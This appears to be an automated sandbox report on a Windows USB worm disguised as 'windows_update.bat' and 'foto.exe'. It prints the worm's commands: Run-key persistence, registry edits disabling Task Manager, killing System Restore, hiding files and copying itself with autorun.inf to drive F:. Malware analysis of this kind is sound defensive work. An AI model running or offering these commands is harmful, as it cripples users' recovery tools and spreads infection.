PID 2296 wrote to memory of 3024	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 3024	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 3024	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 3060	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 3060	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 3060	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 3060	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 3004	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 3004	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 3004	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 3004	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 2936	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 2936	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 2936	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 2936	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 2884	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 2884	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 2884	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 2884	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 2972	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 2972	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 2972	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 2972	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 2912	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 2912	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 2912	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 2912	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 2128	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 2128	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 2128	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 2128	2296	CMD.EXE	attrib.exe

Views/modifies file attributes 1 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

pid	process
2812	attrib.exe
2192	attrib.exe
1492	attrib.exe
108	attrib.exe
2424	attrib.exe
2432	attrib.exe
2952
264	attrib.exe
580	attrib.exe
2756	attrib.exe
2880	attrib.exe
580	attrib.exe
1980
2292	attrib.exe
932	attrib.exe
2172	attrib.exe
2916	attrib.exe
1424	attrib.exe
736	attrib.exe
1948	attrib.exe
1648	attrib.exe
956
1744	attrib.exe
2252	attrib.exe
2064	attrib.exe
1104	attrib.exe
2000	attrib.exe
1720
1060
2676	attrib.exe
1128	attrib.exe
3020	attrib.exe
824	attrib.exe
2036	attrib.exe
3016	attrib.exe
2892	attrib.exe
2452	attrib.exe
1864	attrib.exe
792	attrib.exe
2584	attrib.exe
1424	attrib.exe
3016	attrib.exe
968	attrib.exe
1628	attrib.exe
1376	attrib.exe
2324	attrib.exe
2436	attrib.exe
2204	attrib.exe
1080	attrib.exe
2180	attrib.exe
3020	attrib.exe
580	attrib.exe
1628	attrib.exe
2608	attrib.exe
1576	attrib.exe
792	attrib.exe
660	attrib.exe
1884	attrib.exe
1756	attrib.exe
112	attrib.exe
2812	attrib.exe
1716	attrib.exe
2800	attrib.exe
824	attrib.exe

C:\Users\Admin\AppData\Local\Temp\1.exe
"C:\Users\Admin\AppData\Local\Temp\1.exe"
1⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2256
- C:\Windows\SysWOW64\CMD.EXE
  CMD.EXE /C "%windir%\system32\windows_update.bat"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2296
- - C:\Windows\SysWOW64\reg.exe
    reg add hklm\software\microsoft\windows\currentversion\run /v Micr0soft /t reg_sz /d "C:\WINDOWS\system32\foto.exe" /f
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:1628
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t reg_dword /d 00000001
    3⤵
    PID:2472
- - C:\Windows\SysWOW64\reg.exe
    Reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskbar /t reg_dword /d 00000001 /f
    3⤵
    PID:2564
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t reg_dword /d 00000001
    3⤵
    PID:2652
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +r C:\Windows\system32\foto.exe /s
    3⤵
    PID:2872
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r C:\Windows\system32\windows_update.bat /s
    3⤵
    - Drops file in System32 directory
    PID:3016
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg"
    3⤵
    - Views/modifies file attributes
    PID:3020
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Blue_Gradient.jpg"
    3⤵
    PID:3024
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg"
    3⤵
    PID:3060
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg"
    3⤵
    PID:3004
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg"
    3⤵
    PID:2936
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Monet.jpg"
    3⤵
    PID:2884
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Notebook.jpg"
    3⤵
    PID:2972
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2912
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg"
    3⤵
    PID:2128
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Pine_Lumber.jpg"
    3⤵
    PID:424
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Pretty_Peacock.jpg"
    3⤵
    PID:2952
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Psychedelic.jpg"
    3⤵
    PID:2896
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg"
    3⤵
    PID:3064
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Sand_Paper.jpg"
    3⤵
    - Views/modifies file attributes
    PID:2812
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg"
    3⤵
    PID:2948
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Small_News.jpg"
    3⤵
    - Views/modifies file attributes
    PID:2172
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg"
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg"
    3⤵
    PID:2804
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Tanspecks.jpg"
    3⤵
    PID:2816
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\White_Chocolate.jpg"
    3⤵
    - Views/modifies file attributes
    PID:2916
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Temp\Admin.bmp"
    3⤵
    - Views/modifies file attributes
    PID:580
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Roaming\SuspendLock.jpg"
    3⤵
    PID:2820
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg"
    3⤵
    PID:2776
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2772
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2204
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2600
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1488
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1212
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:1988
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1788
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1136
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1576
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2100
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:812
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:1744
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1680
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:896
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2984
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:584
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1440
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1820
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:2252
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1832
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2248
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2140
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2752
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1432
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:1080
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:660
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:112
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1168
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2192
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2176
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2480
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2132
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1884
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:264
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2220
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2580
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2404
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2416
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2112
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:2732
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1940
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:376
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:888
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1008
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2380
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:1864
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1048
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:672
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2516
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:992
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:272
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1500
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:1108
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2460
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:2568
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1688
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1656
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:1016
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1004
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1828
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2668
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2056
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2728
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2124
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2320
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2392
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:792
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2584
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2448
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2364
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    PID:868
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1716
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1936
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1084
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2312
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2712
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:816
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2724
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1628
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2472
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2872
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3016
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3020
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3024
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1452
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2976
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2784
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2956
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2896
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3064
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:2812
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2948
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2816
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2916
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:580
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2892
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:2792
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2788
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:2576
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1928
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:968
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1160
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:2608
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1636
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1788
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:1136
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2152
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:812
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1744
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Drops autorun.inf file
    PID:1232
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:616
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1436
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2180
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:2684
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:336
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2292
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1180
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2064
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:916
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2316
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:2372
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1264
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1996
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1192
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:2324
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1676
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:860
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
